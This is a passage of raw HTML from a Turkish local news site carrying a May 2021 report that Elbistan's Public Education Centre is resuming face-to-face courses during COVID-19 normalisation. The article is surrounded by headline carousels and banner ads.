<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html" title="Hububat alım fiyatı belli oldu" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/05/tayyip.jpg" alt="Hububat alım fiyatı belli oldu" />
      <div class="caption">Hububat alım fiyatı belli oldu</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html" title="İl genelinde 267 bin 500 doz aşı yapıldı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/05/tesk.jpg" alt="İl genelinde 267 bin 500 doz aşı yapıldı" />
      <div class="caption">İl genelinde 267 bin 500...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html" title="Kaymakam Demir’den 19 Mayıs mesajı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/05/kaymakakk.jpg" alt="Kaymakam Demir’den 19 Mayıs mesajı" />
      <div class="caption">Kaymakam Demir’den 19 Mayıs mesajı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-israil-insanlik-ve-savas-sucu-isliyor-h70062.html" title="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/05/İsimsiz-2.jpg" alt="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”" />
      <div class="caption">Başkan Gürbüz, “İsrail insanlık ve...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/bakan-mus-esnafa-hibe-desteginin-ayrintilarini-acikladi-h70058.html" title="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/05/bakan.jpg" alt="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı" />
      <div class="caption">Bakan Muş, esnafa hibe desteğinin...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-meyve.gif" width="980" height="200" style="width:980px;height: 200px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=80" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Halk Eğitimi Merkezi’nde kurslar yeniden başladı</h1>
                <h2 class="lead" itemprop="description"><strong>Elbistan Halk Eğitimi Merkezi’nde (HEM) açılan kurslarda yüz yüze eğitime yeniden başlandı.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-05-18 17:48:21" content="2021-05-18T17:48:21+02:00">18 Mayıs 2021 Salı 17:48</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" alt="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-70061"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/HUNKAR-GİF_1.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Elbistan Halk Eğitimi Merkezi (HEM) Müdür Vekili Serhat Karahan, Hayatboyu Öğrenme Genel Müdürlüğü kurumlarında verilen tüm kurslarda, hafta içinde yüz yüze eğitime başladıklarını bildirdi. </span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Ülke genelindeki Covid-19 vakalarının azaltılması ve salgınla mücadele kapsamında kademeli normalleşme döneminin başlatıldığını hatırlatan Karahan, Milli Eğitim Bakanlığı’nın aldığı karar doğrultusunda hayat boyu öğrenme kurumlarında verilen hijyen eğitimi, üretim ve istihdama yönelik kurs faaliyetlerinin yüz yüze eğitim şeklinde devam etmesinin kararlaştırıldığını söyledi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Karahan, “Merkezimizde verilen tüm kurslar, 18 Mayıs-1 Haziran 2021 arasında hafta içinde yüz yüze eğitim şeklinde devam edecek. Kurslar, 07.00 ile 21.00 saatleri arasında, günlük çalışma süresi aynı kurstan en fazla sekiz ders saati olacak şekilde uygulanacak” dedi.</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Elbistan Halk Eğitimi Merkezi (HEM) Müdür Vekili Serhat Karahan, 2020-2021 eğitim ve öğretim yılı 3. dönem sınavları için açık öğretim ortaokulu ve açık öğretim lisesi ilk kayıt ve kayıt yenileme işlemleri ile açık öğretim imam hatip lisesi ve mesleki açık öğretim lisesi kayıt yenileme işlemlerinin, 18 Haziran mesai saati bitimine kadar yapılacağını da sözlerine ekledi. </span></span></p>

<p></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/hobisini-meslek-haline-donusturdu-h70064.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-israil-insanlik-ve-savas-sucu-isliyor-h70062.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/goksunlu-milli-futbolcu-kalbine-yenik-dustu-h70060.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bakkallar-odasindan-kadin-esnaflara-anneler-gunu-jesti-h70059.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bakan-mus-esnafa-hibe-desteginin-ayrintilarini-acikladi-h70058.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanin-ilk-modern-serasinda-urun-cesitliligi-artiyor-h70055.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/yoresel-yemeklerimiz-ingilizce-kitapla-tanitilacak-h70054.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/unal-irakta-mahsur-kalan-23-isciyi-ailelerine-kavusturdu-h70053.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bagislari-ile-afrikadaki-bir-koye-can-suyu-oldular-h70052.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ilce-pandemi-kurulu-kademeli-normallesme-icin-toplandi-h70051.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/koronavirusu-50-saniyede-tespit-eden-yapay-zekaya-elbistanli-imzasi-h70050.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/sevilay-ozturk-kahramanmarasin-bir-kez-daha-gogsunu-kabartti-h70049.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/asrin-ozani-asik-mahzuni-serif-vefatinin-19yilinda-aniliyor-h70048.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-takla-atti-3-yarali-2-h70045.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/tam-kapanma-sonrasi-kademeli-normallesme-takvimi-belli-oldu-h70041.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/bayramin-ilk-gunu-islenen-cinayete-4-tutuklama-h70040.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-sahin-tum-isletmeler-pazartesiden-itibaren-acilmali-h70039.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/150-bin-voltluk-akimin-gectigi-direge-tirmaninca-yurekleri-agizlara-h70034.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/filistinliler-icin-giyabi-cenaze-namazi-kilindi-h70033.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/silahla-vurulan-46-yasindaki-kisi-hayatini-kaybetti-h70030.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/gorev-basindaki-polislere-tatli-ikrami-h70029.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/hububat-alim-fiyati-belli-oldu-h70066.html" title="Hububat alım fiyatı belli oldu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/hububat_alim_fiyati_belli_oldu_h70066_c9d55.jpg" alt="Hububat alım fiyatı belli oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hububat alım fiyatı belli oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/il-genelinde-267-bin-500-doz-asi-yapildi-h70065.html" title="İl genelinde 267 bin 500 doz aşı yapıldı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/il_genelinde_267_bin_500_doz_asi_yapildi_h70065_f13d6.jpg" alt="İl genelinde 267 bin 500 doz aşı yapıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İl genelinde 267 bin 500 doz aşı yapıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/hobisini-meslek-haline-donusturdu-h70064.html" title="Hobisini meslek haline dönüştürdü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/hobisini_meslek_haline_donusturdu_h70064_caa56.jpg" alt="Hobisini meslek haline dönüştürdü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hobisini meslek haline dönüştürdü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-19-mayis-mesaji-2-h70063.html" title="Kaymakam Demir’den 19 Mayıs mesajı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/kaymakam_demirden_19_mayis_mesaji_h70063_66738.jpg" alt="Kaymakam Demir’den 19 Mayıs mesajı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir’den 19 Mayıs mesajı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-israil-insanlik-ve-savas-sucu-isliyor-h70062.html" title="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/baskan_gurbuz_israil_insanlik_ve_savas_sucu_isliyor_h70062_60419.jpg" alt="Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz, “İsrail insanlık ve savaş suçu işliyor”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/halk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" title="Halk Eğitimi Merkezi’nde kurslar yeniden başladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/halk_egitimi_merkezinde_kurslar_yeniden_basladi_h70061_58eec.jpg" alt="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Halk Eğitimi Merkezi’nde kurslar yeniden başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/goksunlu-milli-futbolcu-kalbine-yenik-dustu-h70060.html" title="Göksunlu milli futbolcu kalbine yenik düştü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/goksunlu_milli_futbolcu_kalbine_yenik_dustu_h70060_fddfa.jpeg" alt="Göksunlu milli futbolcu kalbine yenik düştü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Göksunlu milli futbolcu kalbine yenik düştü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bakkallar-odasindan-kadin-esnaflara-anneler-gunu-jesti-h70059.html" title="Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/bakkallar_odasindan_kadin_esnaflara_anneler_gunu_jesti_h70059_6aea3.JPG" alt="Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bakkallar Odası’ndan kadın esnaflara Anneler Günü jesti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bakan-mus-esnafa-hibe-desteginin-ayrintilarini-acikladi-h70058.html" title="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/bakan_mus_esnafa_hibe_desteginin_ayrintilarini_acikladi_h70058_b9592.jpg" alt="Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bakan Muş, esnafa hibe desteğinin ayrıntılarını açıkladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistanin-ilk-modern-serasinda-urun-cesitliligi-artiyor-h70055.html" title="Elbistan’ın ilk modern serasında ürün çeşitliliği artıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/elbistanin_ilk_modern_serasinda_urun_cesitliligi_artiyor_h70055_16ec5.jpg" alt="Elbistan’ın ilk modern serasında ürün çeşitliliği artıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’ın ilk modern serasında ürün çeşitliliği artıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/yoresel-yemeklerimiz-ingilizce-kitapla-tanitilacak-h70054.html" title="Yöresel yemeklerimiz İngilizce kitapla tanıtılacak">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/yoresel_yemeklerimiz_ingilizce_kitapla_tanitilacak_h70054_31258.jpg" alt="Yöresel yemeklerimiz İngilizce kitapla tanıtılacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yöresel yemeklerimiz İngilizce kitapla tanıtılacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/unal-irakta-mahsur-kalan-23-isciyi-ailelerine-kavusturdu-h70053.html" title="Ünal, Irak’ta mahsur kalan 23 işçiyi ailelerine kavuşturdu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/unal_irakta_mahsur_kalan_23_isciyi_ailelerine_kavusturdu_h70053_09212.jpg" alt="Ünal, Irak’ta mahsur kalan 23 işçiyi ailelerine kavuşturdu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ünal, Irak’ta mahsur kalan 23 işçiyi ailelerine kavuşturdu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bagislari-ile-afrikadaki-bir-koye-can-suyu-oldular-h70052.html" title="Bağışları ile Afrika’daki bir köye can suyu oldular">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/bagislari_ile_afrikadaki_bir_koye_can_suyu_oldular_h70052_4ae05.jpg" alt="Bağışları ile Afrika’daki bir köye can suyu oldular" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bağışları ile Afrika’daki bir köye can suyu oldular</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ilce-pandemi-kurulu-kademeli-normallesme-icin-toplandi-h70051.html" title="İlçe Pandemi Kurulu, ‘kademeli normalleşme’ için toplandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/ilce_pandemi_kurulu_kademeli_normallesme_icin_toplandi_h70051_84011.jpg" alt="İlçe Pandemi Kurulu, ‘kademeli normalleşme’ için toplandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İlçe Pandemi Kurulu, ‘kademeli normalleşme’ için toplandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/koronavirusu-50-saniyede-tespit-eden-yapay-zekaya-elbistanli-imzasi-h70050.html" title="Koronavirüsü 50 saniyede tespit eden yapay zekaya Elbistanlı imzası">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/koronavirusu_50_saniyede_tespit_eden_yapay_zekaya_elbistanli_imzasi_h70050_f2181.jpeg" alt="Koronavirüsü 50 saniyede tespit eden yapay zekaya Elbistanlı imzası" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Koronavirüsü 50 saniyede tespit eden yapay zekaya Elbistanlı imzası</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/sevilay-ozturk-kahramanmarasin-bir-kez-daha-gogsunu-kabartti-h70049.html" title="Sevilay Öztürk, Kahramanmaraş’ın bir kez daha göğsünü kabarttı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/sevilay_ozturk_kahramanmarasin_bir_kez_daha_gogsunu_kabartti_h70049_d69f0.jpeg" alt="Sevilay Öztürk, Kahramanmaraş’ın bir kez daha göğsünü kabarttı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Sevilay Öztürk, Kahramanmaraş’ın bir kez daha göğsünü kabarttı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/asrin-ozani-asik-mahzuni-serif-vefatinin-19yilinda-aniliyor-h70048.html" title="Asrın ozanı Aşık Mahzuni Şerif, vefatının 19.yılında anılıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/asrin_ozani_asik_mahzuni_serif_vefatinin_19yilinda_aniliyor_h70048_97b69.jpg" alt="Asrın ozanı Aşık Mahzuni Şerif, vefatının 19.yılında anılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Asrın ozanı Aşık Mahzuni Şerif, vefatının 19.yılında anılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/otomobil-takla-atti-3-yarali-2-h70045.html" title="Otomobil takla attı: 3 yaralı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/otomobil_takla_atti_3_yarali_h70045_d2480.jpg" alt="Otomobil takla attı: 3 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Otomobil takla attı: 3 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/tam-kapanma-sonrasi-kademeli-normallesme-takvimi-belli-oldu-h70041.html" title="Tam kapanma sonrası ‘kademeli normalleşme’ takvimi belli oldu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/tam_kapanma_sonrasi_kademeli_normallesme_takvimi_belli_oldu_h70041_6b8c4.jpg" alt="Tam kapanma sonrası ‘kademeli normalleşme’ takvimi belli oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tam kapanma sonrası ‘kademeli normalleşme’ takvimi belli oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/bayramin-ilk-gunu-islenen-cinayete-4-tutuklama-h70040.html" title="Bayramın ilk günü işlenen cinayete 4 tutuklama">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/bayramin_ilk_gunu_islenen_cinayete_4_tutuklama_h70040_1cac5.jpg" alt="Bayramın ilk günü işlenen cinayete 4 tutuklama" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Bayramın ilk günü işlenen cinayete 4 tutuklama</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-sahin-tum-isletmeler-pazartesiden-itibaren-acilmali-h70039.html" title="Başkan Şahin: “Tüm işletmeler Pazartesi’den itibaren açılmalı”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/baskan_sahin_tum_isletmeler_pazartesiden_itibaren_acilmali_h70039_0bd60.jpg" alt="Başkan Şahin: “Tüm işletmeler Pazartesi’den itibaren açılmalı”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Şahin: “Tüm işletmeler Pazartesi’den itibaren açılmalı”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/150-bin-voltluk-akimin-gectigi-direge-tirmaninca-yurekleri-agizlara-h70034.html" title="150 bin voltluk akımın geçtiği direğe tırmanınca yürekleri ağızlara getirdi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/150_bin_voltluk_akimin_gectigi_direge_tirmaninca_yurekleri_agizlara_getirdi_h70034_9b15a.jpg" alt="150 bin voltluk akımın geçtiği direğe tırmanınca yürekleri ağızlara getirdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">150 bin voltluk akımın geçtiği direğe tırmanınca yürekleri ağızlara getirdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/filistinliler-icin-giyabi-cenaze-namazi-kilindi-h70033.html" title="Filistinliler için gıyabi cenaze namazı kılındı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/filistinliler_icin_giyabi_cenaze_namazi_kilindi_h70033_66950.JPG" alt="Filistinliler için gıyabi cenaze namazı kılındı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Filistinliler için gıyabi cenaze namazı kılındı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/silahla-vurulan-46-yasindaki-kisi-hayatini-kaybetti-h70030.html" title="Silahla vurulan 46 yaşındaki kişi hayatını kaybetti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/silahla_vurulan_46_yasindaki_kisi_hayatini_kaybetti_h70030_8f301.jpg" alt="Silahla vurulan 46 yaşındaki kişi hayatını kaybetti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Silahla vurulan 46 yaşındaki kişi hayatını kaybetti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/gorev-basindaki-polislere-tatli-ikrami-h70029.html" title="Görev başındaki polislere tatlı ikramı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/05/gorev_basindaki_polislere_tatli_ikrami_h70029_0456a.jpg" alt="Görev başındaki polislere tatlı ikramı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Görev başındaki polislere tatlı ikramı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
